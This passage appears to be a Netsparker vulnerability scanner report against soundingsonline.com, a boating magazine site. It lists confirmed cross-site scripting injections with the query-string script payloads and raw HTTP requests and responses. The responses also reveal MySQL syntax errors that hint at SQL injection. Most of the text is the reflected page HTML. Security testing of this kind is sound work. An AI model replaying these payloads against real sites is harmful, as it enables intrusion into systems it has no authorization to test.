document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_sea_savvy m_sea_savvy"><!--
Type of page: article<br />Section: 6, s_boat_shop<br />Category: 52, c_sea_savvy<br />Menu: 79, m_sea_savvy-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class="item104"><a href="/archives"><span>Archives</span></a></li><li class="item232"><a href=..
- /career-opportunities

/career-opportunities CONFIRMED

http://www.soundingsonline.com/career-opportunities?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00243F)</script>

Request

GET /career-opportunities?'"--></style></script><script>netsparker(0x00243F)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00243F)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00243F)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/career-opportunities" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Look for Career and Job Opportunites at Soundings Publications, LLC</title> <link href="/career-opportunities?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/career-opportunities?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_career_opportunities"><!--
Type of page: category<br />Section: 12, s_uncategorized<br />Category: 77, c_uncategorized<br />Menu: 56, m_career_opportunities-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RD..
- /boat-shop/know-how/270442-the-bug-out-bag-your-insurance-policy

/boat-shop/know-how/270442-the-bug-out-bag-your-insurance-policy CONFIRMED

http://www.soundingsonline.com/boat-shop/know-how/270442-the-bug-out-bag-your-insurance-policy?'%22-..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00243E)</script>

Request

GET /boat-shop/know-how/270442-the-bug-out-bag-your-insurance-policy?'"--></style></script><script>netsparker(0x00243E)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00243E)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00243E)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/know-how/270442-the-bug-out-bag-your-insurance-policy" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine December 2010
" /> <meta name="title" content="The bug-out bag: your insurance policy" /> <meta name="author" content="Mike Saylor" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>The bug-out bag: your insurance policy</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_know_how m_know_how"><!--
Type of page: article<br />Section: 6, s_boat_shop<br />Category: 45, c_know_how<br />Menu: 93, m_know_how-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
